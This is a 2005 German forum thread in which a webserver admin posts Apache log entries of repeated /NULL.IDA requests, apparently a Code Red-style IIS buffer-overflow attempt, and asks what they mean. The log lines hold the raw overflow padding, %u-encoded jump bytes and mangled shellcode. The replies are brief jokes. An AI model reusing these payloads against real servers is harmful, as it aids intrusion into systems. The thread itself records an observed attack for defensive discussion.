Versuch eine Bufferoverflow?

stieglitz · 8 Februar 2005

Kann hier jemand mit dem folgenden Log unseres Webservers(Apache) etwas anfangen? Die IP kommt von china telekom, das erklärt wohl die komischen Zeichen. Null.Ida ist wohl der Versuch einen Bufferoverflow herbeizuführen. Beim googeln habe ich ausser diesem netten Text

... Es war unerwartet sehr kalt geworden, an die zehn Grad unter null. Ida wurde in der Kälte ohnmächtig und erfror.

auch nichts.

Hier das Log:

ÚµÊÊªYÉÉÉÙÉÑÉÉìŸ™™ÉªYÉfîœ™™ªœ™™Éfœ™™®œ™™Éfœ™™Úœ
™™™Zñ™™™óÙf9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf Åœ™™ªYÉw›™™É¢œ™™É®œ™™ÉfÅœ™™Z™™™™™™™™˜™™™É
¸š™™^š‰™™™ÊÛ™™ÊÉfeœ™™Aa™ÁåEZZ‰™™™óŠöš™™Éf½Ÿ
™™öš ™™Éf©Ÿ™™a™í» é•ge4a™íŠ ™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™Éó›f
€Ÿ™™ó™ó˜ó›fpœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñff™™Éf§Ÿ ™™a™ìé ÿöŸ™™ÿÝ™™èŸ™™ß™™afì– q³fffß™™Þœ™™ó‰Û™™ÊÉfiœ™™a™ìº óœÞœ™™Éflœ™™a™ì’ Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ ™íž ÑrhAê¥šjïášjç¹šb×ªKÏÎÈ¦šb,ÁŸ™™ªP(žjÿ>í• ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™þŸ
™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™
™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«
™ÚëüøíüÉðéü™Þüí ÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™
ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™Üá ðíÍñëüøý™™ÎÊ«Æª«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõ
öêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòö éí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úM=Ûcmd.exe$ HTTP/1.1" 404 309
218.63.208.242 - - [08/Feb/2005:05:09:24 +0100] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%ueac3%u77
f0%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%
u0000%ue0ff%u9090=x&ë _ëèõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Äªâú$ìŸ™™eªP(¹)½k7_Þf™q”™™q™™q
×›™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™™qæ›™™Òœ
™™qÇ™™™q™™™a™íyÒœ™™Éf”Ÿ™™Þœ™™Éf”Ÿ™™¶œ™™Éfœ™
™¢œ™™Éfœ™™!™™™™ÉÖœ™™Éf\œ™™!™™™™ÉfOœ™™ZÒœ™
™ó™ó€š˜™™ÉÒœ™™ÉfšŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ ™™™f&œ™™¶œ™™q_™™™af–/™™™a™íÎ ó™¦œ™™Éñ™™™Úœ™™É¶œ™™Éf/œ™™a™–™™™ó™¦œ™™ÉÚœ™™
ÉÒœ™™ÉfšŸ™™afíý ró™ñ™™™Úœ™™ÉÒœ™™Éf‘Ÿ™™a™í§ afí¬ ªBÊ¦œ™™ÊÉÚœ™™É¢œ™™Éf5œ™™a™í p²fffªYÑZªYZªBÊ½›™™ÊªBÊÊÊÉfœ™™a™í’ ½›™™Z!ffffZ™™™™Úœ™™^™Ý™™™Éfþœ™™Úœ™™ªœ™™ÚÙÚ¥®
œ™™Ú¡!˜˜™™ÚµÊÊªYÉÉÉÙÉÑÉÉìŸ™™ÉªYÉfîœ™™ªœ™™Éfœ™™®œ
™™Éfœ™™Úœ™™™Zñ™™™óÙf9œ™™ZªYÉw›™™^™•™™™Éªœ™™
É¶œ™™ÉfÅœ™™ªYÉw›™™É¢œ™™É®œ™™ÉfÅœ™™Z™™™™™™
™™˜™™™É¸š™™^š‰™™™ÊÛ™™ÊÉfeœ™™Aa™ÁåEZZ‰™™™óŠö
š™™Éf½Ÿ™™öš™™Éf©Ÿ™™a™í» é•ge4a™íŠ ™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™Éó›f€
Ÿ™™ó™ó˜ó›fpœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñff™™Éf§Ÿ
™™a™ìé ÿöŸ™™ÿÝ™™èŸ™™ß™™afì– q³fffß™™Þœ™™ó‰Û™™ÊÉfiœ™™a™ìº óœÞœ™™Éflœ™™a™ì’ Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ ™íž ÑrhAê¥šjïášjç¹šb×ªKÏÎÈ¦šb,ÁŸ™™ªP(žjÿ>í• ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™þŸ
™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™
™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«
™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø÷ýõü™
Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð
÷øíüÉëöúüêê™ÜáðíÍñëüøý™™ÎÊ«Æª«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí
™êü÷ý™ëüúï™úõöêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü
™êüíêöúòöéí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úM=Ûcmd
.exe$ HTTP/1.1" 404 309
218.63.208.242 - - [08/Feb/2005:05:09:30 +0100] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCC%u0aeb%ub890%ueac3%u77f0%u0000%u0000
%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090
=x&ë _ëèõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Äªâú$ìŸ™™eªP(¹)½k7_Þf™q”™™q™™q×›
™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™™qæ›™™Òœ™™qÇ
™™™q™™™a™íyÒœ™™Éf”Ÿ™™Þœ™™Éf”Ÿ™™¶œ™™Éfœ™™¢œ
™™Éfœ™™!™™™™ÉÖœ™™Éf\œ™™!™™™™ÉfOœ™™ZÒœ™™ó
™ó€š˜™™ÉÒœ™™ÉfšŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ ™™™f&œ™™¶œ™™q_™™™af–/™™™a™íÎ ó™¦œ™™Éñ™™™Úœ™™É¶œ™™Éf/œ™™a™–™™™ó™¦œ™™ÉÚœ
™™ÉÒœ™™ÉfšŸ™™afíý ró™ñ™™™Úœ™™ÉÒœ™™Éf‘Ÿ™™a™í§ afí¬ ªBÊ¦œ™™ÊÉÚœ™™É¢œ™™Éf5œ™™a™í p²fffªYÑZªYZªBÊ½›™™ÊªBÊÊÊÉfœ™™a™í’ ½›™™Z!ffffZ™™™™Úœ™™^™Ý™™™Éfþœ™™Úœ™™ªœ™™ÚÙÚ¥®œ
™™Ú¡!˜˜™™ÚµÊÊªYÉÉÉÙÉÑÉÉìŸ™™ÉªYÉfîœ™™ªœ™™Éfœ™™®œ
™™Éfœ™™Úœ™™™Zñ™™™óÙf9œ™™ZªYÉw›™™^™•™™™Éªœ
™™É¶œ™™ÉfÅœ™™eœ™™Aa™ÁåEZZ‰
™™™óŠöš™™Éf½Ÿ™™öš™™Éf©Ÿ™™a™í» é•ge4a™íŠ ™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™
Éó›f€Ÿ™™ó™ó˜ó›fpœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñff
™™Éf§Ÿ™™a™ìé ÿöŸ™™ÿÝ™™èŸ™™ß™™afì– q³fffß™™Þœ™™ó‰Û™™ÊÉfiœ™™a™ìº óœÞœ™™Éflœ™™a™ì’ Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ ™íž ÑrhAê¥šjïášjç¹šb×ªKÏÎÈ¦šb,ÁŸ™™ªP(žjÿ>í• ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™
þŸ™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™
™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×
ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø
÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõü
üé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý™™ÎÊ«Æª«™êöúòüí™ûð÷ý™
õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷ø
ôü™þüíñöêíûà÷øôü™êüíêöúòöéí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýë
üêê™êëî¨éî™úM=Ûcmd.exe$ HTTP/1.1" 404 309
218.63.208.242 - - [08/Feb/2005:05:09:35 +0100] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%uac97%u77e4%u
0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%
u0000%ue0ff%u9090=x&ë _ëèõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Äªâú$ìŸ™™eªP(¹)½k7_Þf™q”™™q
™™q×›™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™™qæ›
™™Òœ™™qÇ™™™q™™™a™íyÒœ™™Éf”Ÿ™™Þœ™™Éf”Ÿ™™¶œ
™™Éfœ™™¢œ™™Éfœ™™!™™™™ÉÖœ™™Éf\œ™™!™™™™Éf
Oœ™™ZÒœ™™ó™ó€š˜™™ÉÒœ™™ÉfšŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«
©”“”“ñ ™™™f&œ™™¶œ™™q_™™™af–/™™™a™íÎ ó™¦œ™™Éñ™™™Úœ™™É¶œ™™Éf/œ™™a™–™™™ó™¦œ™™ÉÚœ
™™ÉÒœ™™ÉfšŸ™™afíý ró™ñ™™™Úœ™™ÉÒœ™™Éf‘Ÿ™™a™í§ afí¬ ªBÊ¦œ™™ÊÉÚœ™™É¢œ™™Éf5œ™™a™í p²fffªYÑZªYZªBÊ½›™™ÊªBÊÊÊÉfœ™™a™í’ ½›™™Z!ffffZ™™™™Úœ™™^™Ý™™™Éfþœ™™Úœ™™ªœ™™ÚÙÚ¥
®œ™™Ú¡!˜˜™™ÚµÊÊªYÉÉÉÙÉÑÉÉìŸ™™ÉªYÉfîœ™™ªœ™™Éfœ™™
®œ™™Éfœ™™Úœ™™™Zñ™™™óÙf9œ™™ZªYÉw›™™^™•™™™É
ªœ™™É¶œ™™ÉfÅœ™™ªYÉw›™™É¢œ™™É®œ™™ÉfÅœ™™Z™™
™™™™™™˜™™™É¸š™™^š‰™™™ÊÛ™™ÊÉfeœ™™Aa™ÁåEZZ‰
™™™óŠöš™™Éf½Ÿ™™öš™™Éf©Ÿ™™a™í» é•ge4a™íŠ ™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™
Éó›f€Ÿ™™ó™ó˜ó›fpœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñf
f™™Éf§Ÿ™™a™ìé ÿöŸ™™ÿÝ™™èŸ™™ß™™afì– q³fffß™™Þœ™™ó‰Û™™ÊÉfiœ™™a™ìº óœÞœ™™Éflœ™™a™ì’ Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ ™íž ÑrhAê¥šjïášjç¹šb×ªKÏÎÈ¦šb,ÁŸ™™ªP(žjÿ>í• ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ
™™™þŸ™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ
™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™
™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉë
öúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îë
ðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý
™™ÎÊ«Æª«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõ
öêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöú
òöéí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úM=Ûcmd.exe$ HTTP/1.1" 404 309

Heiko · 8 Februar 2005

Sowas hab ich auch bisweilen im Log.
Das führt zu einer Penalty für den verursachenden Rechner ;-)

stieglitz · 8 Februar 2005

Heiko schrieb:
Sowas hab ich auch bisweilen im Log.
Das führt zu einer Penalty für den verursachenden Rechner

Penalty = Strafe ?

Wer oder Was und Wie wird der Rechner bestraft?

Captain Picard · 8 Februar 2005

stieglitz schrieb:
Wer oder Was und Wie wird der Rechner bestraft?

http://home.wolfsburg.de/a-047862-09224-0001/
:wink:

cp

stieglitz · 8 Februar 2005

du kummst hier net rein

Versuch eine Bufferoverflow?

stieglitz

Mitglied

Heiko

root

stieglitz

Mitglied

Captain Picard

Commander

stieglitz

Mitglied